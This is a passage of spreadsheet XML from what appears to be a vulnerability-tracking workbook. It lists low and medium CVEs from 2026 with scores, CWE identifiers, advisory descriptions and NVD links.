Panorama, Cloud NGFW, and Prisma® Access are not impacted by this vulnerability.</t>
        </is>
      </c>
      <c r="M5757" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0309</t>
        </is>
      </c>
    </row>
    <row r="5758">
      <c r="A5758" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5758" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12285</t>
        </is>
      </c>
      <c r="C5758" s="5" t="n">
        <v>4</v>
      </c>
      <c r="D5758" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5758" s="5" t="inlineStr"/>
      <c r="F5758" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5758" s="5" t="inlineStr"/>
      <c r="H5758" s="5" t="inlineStr"/>
      <c r="I5758" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5758" s="5" t="inlineStr"/>
      <c r="K5758" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L5758"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
        </is>
      </c>
      <c r="M5758" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12285</t>
        </is>
      </c>
    </row>
    <row r="5759">
      <c r="A5759" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5759" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28581</t>
        </is>
      </c>
      <c r="C5759" s="5" t="n">
        <v>4</v>
      </c>
      <c r="D5759" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5759" s="5" t="inlineStr"/>
      <c r="F5759" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5759" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5759" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="I5759" s="5" t="inlineStr">
        <is>
          <t>2026-06-01</t>
        </is>
      </c>
      <c r="J5759" s="5" t="inlineStr"/>
      <c r="K5759" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L5759" s="5" t="inlineStr">
        <is>
          <t>In fixInitiatingUserIfNecessary of CallIntentProcessor.java, there is a possible way to make an emergency call due to a logic error in the code. This could lead to local escalation with User execution privileges needed. User interaction is needed for exploitation.</t>
        </is>
      </c>
      <c r="M5759" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28581</t>
        </is>
      </c>
    </row>
    <row r="5760">
      <c r="A5760" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5760" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39113</t>
        </is>
      </c>
      <c r="C5760" s="5" t="n">
        <v>4</v>
      </c>
      <c r="D5760" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5760" s="5" t="inlineStr"/>
      <c r="F5760" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5760" s="5" t="inlineStr"/>
      <c r="H5760" s="5" t="inlineStr"/>
      <c r="I5760" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J5760" s="5" t="inlineStr"/>
      <c r="K5760" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L5760" s="5" t="inlineStr">
        <is>
          <t>Buffer Overflow vulnerability in SQLite affected version source snapshots/builds containing Fossil check-in 8bdc0d485e3ad0c7a1e818da66f106951d496b05cbe61d12c2c448f2f24b6d5d (Git mirror 169f68ed88b34cb68f720191c64c058f2ccec508, 2026-03-11) and later snapshots/builds allows an attacker to cause a denial of service via the ext/misc/sqlar.c, sqlarUncompressFunc(), sqlar_uncompress(), sqlite3_value_int64(), sqlite3_malloc(int), uncompress() components</t>
        </is>
      </c>
      <c r="M5760" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39113</t>
        </is>
      </c>
    </row>
    <row r="5761">
      <c r="A5761" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5761" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49312</t>
        </is>
      </c>
      <c r="C5761" s="5" t="n">
        <v>4</v>
      </c>
      <c r="D5761" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5761" s="5" t="inlineStr"/>
      <c r="F5761" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5761" s="5" t="inlineStr"/>
      <c r="H5761" s="5" t="inlineStr"/>
      <c r="I5761" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5761" s="5" t="inlineStr"/>
      <c r="K5761" s="5" t="inlineStr">
        <is>
          <t>CWE-264</t>
        </is>
      </c>
      <c r="L5761" s="5" t="inlineStr">
        <is>
          <t>Permission control vulnerability in the window module.
Impact: Successful exploitation of this vulnerability may affect service confidentiality.</t>
        </is>
      </c>
      <c r="M5761" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49312</t>
        </is>
      </c>
    </row>
    <row r="5762">
      <c r="A5762" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5762" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70595</t>
        </is>
      </c>
      <c r="C5762" s="5" t="n">
        <v>4</v>
      </c>
      <c r="D5762" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5762" s="5" t="inlineStr"/>
      <c r="F5762" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5762" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H5762" s="5" t="inlineStr"/>
      <c r="I5762" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J5762" s="5" t="inlineStr"/>
      <c r="K5762" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L5762" s="5" t="inlineStr">
        <is>
          <t>Ghost is a Node.js content management system. From 6.26.0 until 6.54.1, a validation issue allowed some functionality, such as Webmentions, to be abused by an unauthenticated user to make limited HTTP requests to hosts in the Ghost server's internal network. A successful attack would not result in any response data being returned. This vulnerability is fixed in 6.54.1.</t>
        </is>
      </c>
      <c r="M5762" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70595</t>
        </is>
      </c>
    </row>
    <row r="5763">
      <c r="A5763" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5763" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75421</t>
        </is>
      </c>
      <c r="C5763" s="5" t="n">
        <v>4</v>
      </c>
      <c r="D5763" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5763" s="5" t="inlineStr"/>
      <c r="F5763" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5763" s="5" t="inlineStr"/>
      <c r="H5763" s="5" t="inlineStr"/>
      <c r="I5763" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J5763" s="5" t="inlineStr"/>
      <c r="K5763" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L5763" s="5" t="inlineStr">
        <is>
          <t>aria2 &lt;=1.37.0 has a stack-buffer-underflow vulnerability in the IOFile::getLine() function.</t>
        </is>
      </c>
      <c r="M5763" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75421</t>
        </is>
      </c>
    </row>
    <row r="5764">
      <c r="A5764" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5764" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79516</t>
        </is>
      </c>
      <c r="C5764" s="5" t="n">
        <v>4</v>
      </c>
      <c r="D5764" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5764" s="5" t="inlineStr"/>
      <c r="F5764" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5764" s="5" t="inlineStr"/>
      <c r="H5764" s="5" t="inlineStr"/>
      <c r="I5764" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5764" s="5" t="inlineStr"/>
      <c r="K5764" s="5" t="inlineStr"/>
      <c r="L5764" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read in the stbsp_vsnprintf function (stb_sprintf.h) of nothings stb commit 31c1ad3 allows attackers to cause a Denial of Service (DoS) via sending a crafted input.</t>
        </is>
      </c>
      <c r="M5764" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79516</t>
        </is>
      </c>
    </row>
    <row r="5765">
      <c r="A5765" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5765" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80159</t>
        </is>
      </c>
      <c r="C5765" s="5" t="n">
        <v>4</v>
      </c>
      <c r="D5765" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5765" s="5" t="inlineStr"/>
      <c r="F5765" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5765" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H5765" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="I5765" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5765" s="5" t="inlineStr"/>
      <c r="K5765" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="L5765" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an Untrusted Search Path vulnerability that could result in privilege escalation. An attacker with high privileges could leverage this vulnerability to gain elevated access. Exploit depends on conditions beyond the attacker's control. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M5765" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80159</t>
        </is>
      </c>
    </row>
    <row r="5766">
      <c r="A5766" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5766" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80213</t>
        </is>
      </c>
      <c r="C5766" s="5" t="n">
        <v>4</v>
      </c>
      <c r="D5766" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5766" s="5" t="inlineStr"/>
      <c r="F5766" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5766" s="5" t="inlineStr"/>
      <c r="H5766" s="5" t="inlineStr"/>
      <c r="I5766" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J5766" s="5" t="inlineStr"/>
      <c r="K5766" s="5" t="inlineStr">
        <is>
          <t>CWE-197</t>
        </is>
      </c>
      <c r="L5766" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in the resolv gem before 0.7.2 for Ruby. Resolv::DNS::MessageEncoder wrote a DNS label's length into a single octet without checking its range. A label longer than 255 octets had its length stored modulo 256 but the label data was written unchanged, and thus the bytes on the wire described a different name than the one the application asked to encode. RFC 1035 section 2.3.4 limits a label to 63 octets, and the two high bits of the length octet are reserved for compression pointers. put_string packed the length with put_pack("C", d.length) and put_label used it for labels, and thus any value from 0 to 255 could end up as a label length octet, including the reserved 0x40-0xBF range and the 0xC0-0xFF pointer range. Resolv::DNS::Name.create did not check per-label or total name length either, and thus an attacker-controlled hostname reached the encoder unchanged. An application that resolves an attacker-controlled hostname sends a query whose wire bytes name a domain the attacker chose. A hostname suffix that the application validates against an allowlist becomes padding that never appears on the wire, and thus allowlist and egress checks can be bypassed. The recursive resolver caches the response under the attacker's name, and DNS logs record that name rather than the one the application asked for. A label length whose low octet lands in the 0xC0-0xFF range produces a length octet that conforming parsers read as the start of a compression pointer, with the following attacker-controlled byte as the offset.</t>
        </is>
      </c>
      <c r="M5766" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80213</t>
        </is>
      </c>
    </row>
    <row r="5767">
      <c r="A5767" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5767" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87486</t>
        </is>
      </c>
      <c r="C5767" s="5" t="n">
        <v>4</v>
      </c>
      <c r="D5767" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5767" s="5" t="inlineStr"/>
      <c r="F5767" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5767" s="5" t="inlineStr"/>
      <c r="H5767" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="I5767" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5767" s="5" t="inlineStr"/>
      <c r="K5767" s="5" t="inlineStr">
        <is>
          <t>CWE-1021</t>
        </is>
      </c>
      <c r="L5767" s="5" t="inlineStr">
        <is>
          <t>Clickjacking in TrustedWebActivities in Google Chrome on on Android prior to 153.0.8010.36 allowed a local attacker to spoof address bar via a co-installed app. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5767" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87486</t>
        </is>
      </c>
    </row>
    <row r="5768">
      <c r="A5768" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5768" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88059</t>
        </is>
      </c>
      <c r="C5768" s="5" t="n">
        <v>4</v>
      </c>
      <c r="D5768" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5768" s="5" t="inlineStr"/>
      <c r="F5768" s="5" t="inlineStr"/>
      <c r="G5768" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5768" s="5" t="inlineStr"/>
      <c r="I5768" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5768" s="5" t="inlineStr"/>
      <c r="K5768" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-524</t>
        </is>
      </c>
      <c r="L5768" s="5" t="inlineStr">
        <is>
          <t>Angular is a development platform for building mobile and desktop web applications using TypeScript/JavaScript and other languages. Prior to 20.3.28, 21.2.20, and 22.1.1, Angular's @angular/common HttpTransferCache can cache an authenticated response when Server-Side Rendering (SSR) and hydration use a hierarchical HttpClient configured with withRequestsMadeViaParent. The child TransferCache evaluates an initially anonymous request before delegation, then a parent withInterceptors chain adds an Authorization header, cookie, or API token; although the parent cache skips the authenticated request, the child still stores the private response in TransferState serialized as JSON in the ng-state script. Exploitation requires provideClientHydration, child provideHttpClient delegation through withRequestsMadeViaParent, parent-level credential injection, and an SSR HTML response shared across users by a CDN, reverse proxy, or application cache. A later unauthenticated or unauthorized visitor can receive the cached HTML containing the earlier authenticated user's sensitive response data. Applications can mitigate by attaching credentials at the child, filtering sensitive endpoints with withHttpTransferCacheOptions, disabling transfer caching for sensitive routes, or marking personalized HTML private or no-store. This issue is fixed in versions 20.3.28, 21.2.20, and 22.1.1.</t>
        </is>
      </c>
      <c r="M5768" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88059</t>
        </is>
      </c>
    </row>
    <row r="5769">
      <c r="A5769" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5769" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70598</t>
        </is>
      </c>
      <c r="C5769" s="5" t="n">
        <v>3.9</v>
      </c>
      <c r="D5769" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5769" s="5" t="inlineStr"/>
      <c r="F5769" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5769" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5769" s="5" t="inlineStr"/>
      <c r="I5769" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J5769" s="5" t="inlineStr"/>
      <c r="K5769" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L5769" s="5" t="inlineStr">
        <is>
          <t>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.10, 40.9.0, 41.2.1, and 42.0.0-beta.3, offscreen rendering frame data received from the GPU process was not fully validated by the main process. A compromised GPU process could cause the main process to read out-of-bounds memory while producing paint event images, disclosing memory or crashing the app. This issue is fixed in 39.8.10, 40.9.0, 41.2.1, and 42.0.0-beta.3.</t>
        </is>
      </c>
      <c r="M5769" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70598</t>
        </is>
      </c>
    </row>
    <row r="5770">
      <c r="A5770" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5770" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70467</t>
        </is>
      </c>
      <c r="C5770" s="5" t="n">
        <v>3.8</v>
      </c>
      <c r="D5770" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5770" s="5" t="inlineStr"/>
      <c r="F5770" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5770" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="H5770" s="5" t="inlineStr">
        <is>
          <t>fortinet:fortisiem</t>
        </is>
      </c>
      <c r="I5770" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J5770" s="5" t="inlineStr"/>
      <c r="K5770" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L5770" s="5" t="inlineStr">
        <is>
          <t>A server-side request forgery (ssrf) vulnerability in Fortinet FortiSIEM 7.5.0, FortiSIEM 7.4.0 through 7.4.2, FortiSIEM 7.3.0 through 7.3.5, FortiSIEM 7.2 all versions, FortiSIEM 7.1 all versions, FortiSIEM 7.0 all versions, FortiSIEM 6.7 all versions, FortiSIEM 6.6 all versions, FortiSIEM 6.5 all versions may allow attacker to execute unauthorized code or commands via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="M5770" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70467</t>
        </is>
      </c>
    </row>
    <row r="5771">
      <c r="A5771" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5771" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13144</t>
        </is>
      </c>
      <c r="C5771" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="D5771" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5771" s="5" t="inlineStr"/>
      <c r="F5771" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5771" s="5" t="inlineStr"/>
      <c r="H5771" s="5" t="inlineStr"/>
      <c r="I5771" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5771" s="5" t="inlineStr"/>
      <c r="K5771" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L5771" s="5" t="inlineStr">
        <is>
          <t>The WP Travel  WordPress plugin before 12.0.2 does not properly verify that the requester is authorized to modify the targeted booking on one branch of its bank-deposit handler, allowing an unauthenticated attacker who knows the target customer's email address to reset that customer's booking payment to an unpaid state and wipe its stored deposit-reconciliation data.</t>
        </is>
      </c>
      <c r="M5771" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13144</t>
        </is>
      </c>
    </row>
    <row r="5772">
      <c r="A5772" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5772" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13146</t>
        </is>
      </c>
      <c r="C5772" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="D5772" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5772" s="5" t="inlineStr"/>
      <c r="F5772" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5772" s="5" t="inlineStr"/>
      <c r="H5772" s="5" t="inlineStr"/>
      <c r="I5772" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5772" s="5" t="inlineStr"/>
      <c r="K5772" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L5772" s="5" t="inlineStr">
        <is>
          <t>The WP Travel  WordPress plugin before 12.0.2 does not properly verify that the requester owns the booking targeted by its bank-deposit slip submission, allowing an unauthenticated attacker who knows the target customer's email address to change that customer's booking payment state and attach a file to it.</t>
        </is>
      </c>
      <c r="M5772" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13146</t>
        </is>
      </c>
    </row>
    <row r="5773">
      <c r="A5773" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5773" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18540</t>
        </is>
      </c>
      <c r="C5773" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="D5773" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5773" s="5" t="inlineStr"/>
      <c r="F5773" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5773" s="5" t="inlineStr"/>
      <c r="H5773" s="5" t="inlineStr"/>
      <c r="I5773" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5773" s="5" t="inlineStr"/>
      <c r="K5773" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="L5773" s="5" t="inlineStr">
        <is>
          <t>undici's retry interceptor can append the body of a ranged retry response to bytes already delivered from an earlier partial response while still presenting the original response's status and headers. This happens when an upstream server delivers part of a body without a trustworthy resume checkpoint, for example a non-success response whose headers were already sent or a partial-content response with an unusable content range, then closes the connection and answers the resumed range request with more bytes. As a result the response body can be longer than the Content-Length that the application observes. An application that relays such a response to a downstream HTTP/1.1 peer without normalizing the framing can emit a body that exceeds the forwarded Content-Length, and the excess bytes can be interpreted as the start of a following response, which enables downstream response splitting or desynchronization. Exploitation requires an attacker-controlled upstream server and an application that forwards the response through a framing-sensitive path. This affects undici versions before 6.28.1, from 7.0.0 up to 7.29.1, and from 8.0.0 up to 8.10.2. Users should upgrade to undici 6.28.1, 7.29.1, or 8.10.2.</t>
        </is>
      </c>
      <c r="M5773" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18540</t>
        </is>
      </c>
    </row>
    <row r="5774">
      <c r="A5774" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5774" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48082</t>
        </is>
      </c>
      <c r="C5774" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="D5774" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5774" s="5" t="inlineStr"/>
      <c r="F5774" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5774" s="5" t="inlineStr"/>
      <c r="H5774" s="5" t="inlineStr"/>
      <c r="I5774" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J5774" s="5" t="inlineStr"/>
      <c r="K5774" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L5774" s="5" t="inlineStr">
        <is>
          <t>OpenReception's appointment booking software provides an end-to-end encrypted appointment booking platform. Prior to version 1.0.6, the bootstrap challenge endpoint at `/api/tenants/{id}/appointments/bootstrap-challenge` issues a SHA-256 proof-of-work with `difficulty=4` hex zeros, equivalent to 16 bits of work. Modern hardware solves this in under 200 milliseconds, providing essentially no friction against automated abuse of the patient booking flow. Proof-of-work is used in the booking flow as a rate-limiter for unauthenticated clients establishing tunnels and submitting appointments. At 16 bits of difficulty, the construct is decorative rather than effective. An attacker can solve PoW challenges as fast as the server can issue them, defeating the rate-limiting purpose. The handler also calls `challengeThrottleService.checkThrottle(binding, "passkey")`, but the binding includes attacker-controlled values (`tunnelId`, `clientPublicKey`, and optional `emailHash`). For each fresh attempt, the attacker can supply new values, producing a new throttle key and bypassing the per-binding accumulation. Practical abuse friction is therefore the PoW difficulty itself, not a stable per-IP or per-email server-side throttle. Version 1.0.6 fixes the issue.</t>
        </is>
      </c>
      <c r="M5774" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48082</t>
        </is>
      </c>
    </row>
    <row r="5775">
      <c r="A5775" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5775" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54713</t>
        </is>
      </c>
      <c r="C5775" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="D5775" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5775" s="5" t="inlineStr"/>
      <c r="F5775" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5775" s="5" t="inlineStr"/>
      <c r="H5775" s="5" t="inlineStr"/>
      <c r="I5775" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J5775" s="5" t="inlineStr"/>
      <c r="K5775" s="5" t="inlineStr">
        <is>
          <t>CWE-1023</t>
        </is>
      </c>
      <c r="L5775" s="5" t="inlineStr">
        <is>
          <t>CakePHP Queue is a queue-interop compatible queueing library. From 0.1.11 until 2.3.1, QueueManager::getUniqueId() generates identifiers for jobs with shouldBeUnique enabled from the job class, method, and parameters, but sorting parameter values drops associative-array keys. An unauthenticated attacker who can influence job parameters can submit semantically different data that produces the same identifier, resulting in legitimate jobs dropped as duplicate collisions. This issue is fixed in version 2.3.1.</t>
        </is>
      </c>
      <c r="M5775" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54713</t>
        </is>
      </c>
    </row>
    <row r="5776">
      <c r="A5776" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5776" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55785</t>
        </is>
      </c>
      <c r="C5776" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="D5776" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5776" s="5" t="inlineStr"/>
      <c r="F5776" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5776" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H5776" s="5" t="inlineStr"/>
      <c r="I5776" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J5776" s="5" t="inlineStr"/>
      <c r="K5776" s="5" t="inlineStr">
        <is>
          <t>CWE-208, CWE-385, CWE-532</t>
        </is>
      </c>
      <c r="L5776" s="5" t="inlineStr">
        <is>
          <t>free5GC is an open-source implementation of the 5G core network. Prior to 1.4.5, the AUSF component performs cryptographic authentication comparisons in internal/sbi/processor/ue_authentication.go with ordinary equality helpers. Auth5gAkaComfirmRequestProcedure compares RES* and XRES* with strings.EqualFold and logs the expected XRES* value at INFO level before comparison. EapAuthComfirmRequestProcedure compares AT_MAC and XMAC with bytes.Equal and evaluates XRES == RES with ordinary string equality. These comparisons can return at mismatch-dependent times, although testing did not demonstrate a practical remote timing oracle because of HTTP/SBI timing noise. The INFO log exposes authentication material to operators, log collectors, sidecars, or processes able to read AUSF logs. This issue is fixed in version 1.4.5.</t>
        </is>
      </c>
      <c r="M5776" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55785</t>
        </is>
      </c>
    </row>
    <row r="5777">
      <c r="A5777" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5777" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58239</t>
        </is>
      </c>
      <c r="C5777" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="D5777" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5777" s="5" t="inlineStr"/>
      <c r="F5777" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5777" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H5777" s="5" t="inlineStr">
        <is>
          <t>sap:approuter</t>
        </is>
      </c>
